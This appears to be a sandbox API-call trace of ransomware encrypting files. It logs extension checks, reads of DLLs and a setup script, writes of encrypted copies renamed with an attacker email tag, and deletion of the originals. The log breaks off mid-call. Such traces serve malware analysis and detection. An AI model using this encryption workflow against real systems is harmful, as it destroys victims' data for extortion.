lstrlenW (lpString=".xlsx") returned 5 [0071.236] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0071.236] lstrlenW (lpString=".ppt") returned 4 [0071.236] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0071.236] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 91 [0071.236] lstrlenW (lpString=".zip") returned 4 [0071.236] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0071.236] lstrlenW (lpString=".rar") returned 4 [0071.236] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0071.236] lstrlenW (lpString=".bz2") returned 4 [0071.236] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0071.236] lstrlenW (lpString=".7z") returned 3 [0071.236] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0071.236] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 91 [0071.236] lstrlenW (lpString=".dbf") returned 4 [0071.237] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0071.237] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 91 [0071.237] lstrlenW (lpString=".1cd") returned 4 [0071.237] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0071.237] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 91 [0071.237] lstrlenW (lpString=".jpg") returned 4 [0071.237] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0071.237] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0071.237] lstrlenW (lpString="api-ms-win-crt-conio-l1-1-0.dll") returned 31 [0071.237] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0071.237] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=19648) returned 1 [0071.237] CloseHandle (hObject=0x39c) returned 1 [0071.238] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll")) returned 0x20 [0071.238] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0071.238] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0071.238] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.238] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.238] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0071.238] GetLastError () returned 0x0 [0071.238] ReadFile (in: hFile=0x39c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x4cc0, lpOverlapped=0x0) returned 1 [0071.240] WriteFile (in: hFile=0x388, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x4cd0, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x4cd0, lpOverlapped=0x0) returned 1 [0071.241] ReadFile (in: hFile=0x39c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0071.242] WriteFile (in: hFile=0x388, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x112, lpOverlapped=0x0) returned 1 [0071.242] SetEndOfFile (hFile=0x388) returned 1 [0071.242] CloseHandle (hObject=0x388) returned 1 [0071.242] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.242] SetEndOfFile (hFile=0x39c) returned 1 [0071.243] CloseHandle (hObject=0x39c) returned 1 [0071.243] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0071.243] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll")) returned 1 [0071.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 89 [0071.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 89 [0071.244] lstrlenW (lpString=".doc") returned 4 [0071.244] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0071.244] lstrlenW (lpString=".docx") returned 5 [0071.244] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0071.244] lstrlenW (lpString=".pdf") returned 4 [0071.244] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0071.244] lstrlenW (lpString=".xls") returned 4 [0071.244] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0071.244] lstrlenW (lpString=".xlsx") returned 5 [0071.244] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0071.244] lstrlenW (lpString=".ppt") returned 4 [0071.244] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0071.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 89 [0071.244] lstrlenW (lpString=".zip") returned 4 [0071.244] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0071.244] lstrlenW (lpString=".rar") returned 4 [0071.244] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0071.244] lstrlenW (lpString=".bz2") returned 4 [0071.244] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0071.244] lstrlenW (lpString=".7z") returned 3 [0071.244] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0071.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 89 [0071.244] lstrlenW (lpString=".dbf") returned 4 [0071.244] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0071.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 89 [0071.245] lstrlenW (lpString=".1cd") returned 4 [0071.245] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0071.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 89 [0071.245] lstrlenW (lpString=".jpg") returned 4 [0071.245] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0071.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 89 [0071.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 89 [0071.245] lstrlenW (lpString=".doc") returned 4 [0071.245] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0071.245] lstrlenW (lpString=".docx") returned 5 [0071.245] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0071.245] lstrlenW (lpString=".pdf") returned 4 [0071.245] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0071.245] lstrlenW (lpString=".xls") returned 4 [0071.245] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0071.245] lstrlenW (lpString=".xlsx") returned 5 [0071.245] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0071.245] lstrlenW (lpString=".ppt") returned 4 [0071.245] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0071.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 89 [0071.245] lstrlenW (lpString=".zip") returned 4 [0071.245] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0071.245] lstrlenW (lpString=".rar") returned 4 [0071.245] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0071.245] lstrlenW (lpString=".bz2") returned 4 [0071.245] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0071.245] lstrlenW (lpString=".7z") returned 3 [0071.246] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0071.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 89 [0071.246] lstrlenW (lpString=".dbf") returned 4 [0071.246] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0071.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 89 [0071.246] lstrlenW (lpString=".1cd") returned 4 [0071.246] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0071.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 89 [0071.246] lstrlenW (lpString=".jpg") returned 4 [0071.246] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0071.246] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0071.246] lstrlenW (lpString="api-ms-win-crt-convert-l1-1-0.dll") returned 33 [0071.246] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0071.246] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=22720) returned 1 [0071.247] CloseHandle (hObject=0x39c) returned 1 [0071.247] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll")) returned 0x20 [0071.247] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0071.247] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0071.247] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.247] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.247] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0071.644] GetLastError () returned 0x0 [0071.644] ReadFile (in: hFile=0x39c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x58c0, lpOverlapped=0x0) returned 1 [0071.656] WriteFile (in: hFile=0x384, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x58d0, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x58d0, lpOverlapped=0x0) returned 1 [0071.658] ReadFile (in: hFile=0x39c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0071.658] WriteFile (in: hFile=0x384, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x116, lpOverlapped=0x0) returned 1 [0071.658] SetEndOfFile (hFile=0x384) returned 1 [0071.658] CloseHandle (hObject=0x384) returned 1 [0071.658] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.658] SetEndOfFile (hFile=0x39c) returned 1 [0071.659] CloseHandle (hObject=0x39c) returned 1 [0071.659] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0071.659] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll")) returned 1 [0071.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 91 [0071.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 91 [0071.901] lstrlenW (lpString=".doc") returned 4 [0071.901] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0071.901] lstrlenW (lpString=".docx") returned 5 [0071.901] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0071.901] lstrlenW (lpString=".pdf") returned 4 [0071.901] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0071.901] lstrlenW (lpString=".xls") returned 4 [0071.901] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0071.901] lstrlenW (lpString=".xlsx") returned 5 [0071.901] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0071.901] lstrlenW (lpString=".ppt") returned 4 [0071.901] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0071.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 91 [0071.902] lstrlenW (lpString=".zip") returned 4 [0071.902] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0071.902] lstrlenW (lpString=".rar") returned 4 [0071.902] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0071.902] lstrlenW (lpString=".bz2") returned 4 [0071.902] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0071.902] lstrlenW (lpString=".7z") returned 3 [0071.902] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0071.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 91 [0071.902] lstrlenW (lpString=".dbf") returned 4 [0071.902] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0071.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 91 [0071.902] lstrlenW (lpString=".1cd") returned 4 [0071.902] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0071.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 91 [0071.902] lstrlenW (lpString=".jpg") returned 4 [0071.902] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0071.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 91 [0071.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 91 [0071.902] lstrlenW (lpString=".doc") returned 4 [0071.902] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0071.902] lstrlenW (lpString=".docx") returned 5 [0071.902] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0071.902] lstrlenW (lpString=".pdf") returned 4 [0071.902] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0071.902] lstrlenW (lpString=".xls") returned 4 [0071.902] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0071.902] lstrlenW (lpString=".xlsx") returned 5 [0071.902] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0071.902] lstrlenW (lpString=".ppt") returned 4 [0071.902] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0071.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 91 [0071.902] lstrlenW (lpString=".zip") returned 4 [0071.902] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0071.902] lstrlenW (lpString=".rar") returned 4 [0071.902] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0071.902] lstrlenW (lpString=".bz2") returned 4 [0071.903] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0071.903] lstrlenW (lpString=".7z") returned 3 [0071.903] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0071.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 91 [0071.903] lstrlenW (lpString=".dbf") returned 4 [0071.903] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0071.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 91 [0071.903] lstrlenW (lpString=".1cd") returned 4 [0071.903] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0071.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 91 [0071.903] lstrlenW (lpString=".jpg") returned 4 [0071.903] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0071.903] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0071.903] lstrlenW (lpString="api-ms-win-crt-heap-l1-1-0.dll") returned 30 [0071.903] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0071.903] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=19648) returned 1 [0071.903] CloseHandle (hObject=0x3a0) returned 1 [0071.903] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll")) returned 0x20 [0071.909] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0071.909] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0071.909] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.909] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.909] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0071.910] GetLastError () returned 0x0 [0071.910] ReadFile (in: hFile=0x3a0, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x4cc0, lpOverlapped=0x0) returned 1 [0072.273] WriteFile (hFile=0x398, lpBuffer=0x3f14020, nNumberOfBytesToWrite=0x4cd0, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0) Thread: id = 17 os_tid = 0xa34 [0045.443] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x3c70e28 [0045.443] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x3c80e30 [0045.444] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cfb0 [0045.444] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6) returned 0x65d160 [0045.444] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62ce30 [0045.444] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100000) returned 0x4026020 [0045.446] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62ce48 [0045.446] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62ce48, Size=0x20) returned 0x60e9d0 [0045.446] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cef0 [0045.446] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62cef0, Size=0x20) returned 0x60ea20 [0045.446] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0045.446] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0045.446] Wow64DisableWow64FsRedirection (in: OldValue=0x334ff50 | out: OldValue=0x334ff50*=0x0) returned 1 [0045.446] lstrlenW (lpString="kernel32.dll") returned 12 [0045.446] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e9d0 | out: hHeap=0x5d0000) returned 1 [0045.446] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0045.446] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60ea20 | out: hHeap=0x5d0000) returned 1 [0045.447] Sleep (dwMilliseconds=0x64) [0045.633] Sleep (dwMilliseconds=0x64) [0045.803] lstrcmpiW (lpString1=".cmd", lpString2=".bat") returned 1 [0045.803] lstrlenW (lpString="SetupComplete.cmd") returned 17 [0045.803] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0045.884] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=307) returned 1 [0045.884] CloseHandle (hObject=0x2c8) returned 1 [0045.884] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd")) returned 0x20 [0045.884] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0045.884] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0045.885] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0045.885] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0045.885] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, 